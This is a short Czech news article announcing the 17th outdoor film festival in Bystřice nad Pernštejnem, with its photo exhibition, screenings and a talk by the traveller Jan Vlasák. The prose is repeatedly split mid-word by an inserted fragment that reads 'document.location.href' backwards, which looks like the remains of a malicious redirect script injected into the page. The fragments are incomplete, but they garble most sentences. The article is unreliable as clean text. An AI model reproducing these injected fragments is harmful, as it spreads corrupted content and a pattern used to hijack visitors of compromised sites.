Rainbow page separator

Bystřice bude hostit sedmnáctý festival outdoorových filmů

Pondělí, 28. října 2019

Bystřice nad Pernštejnem / V pořadí už sedmnáctý pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní Mezinárodní festival outdoorových filmů bude v pátek 1. a v sobotu 2. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu hostit Bystřice nad Pernštejnem – ve městě se festival odehraje už podeváté. Začne v pátek 1. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu po šestnácté hodině vernisáží fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií bystřického fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografa Michala Vytlačila. V 17 hodin pak bude zahájen první promítací blok soutěžních snímků.
Sobotní program začne ve 14 hodin, přičemž v rámci doprovodných akcí na besedu do Bystřice od 17 hodin zavítá cykloces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatel, horolezec a spisovatel Jan Vlasák, který na kole proces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval padesát zemí světa. Kromě besedy se návštěvníci festivalu mohou těšit i na au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramiádu a prodej jeho knih.
Ani v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce v kulturním domě nebudou chybět expozice lyží Sporten a jízdních kol Superior či výstava místního horolezeckého oddílu Lezci z Vysočiny.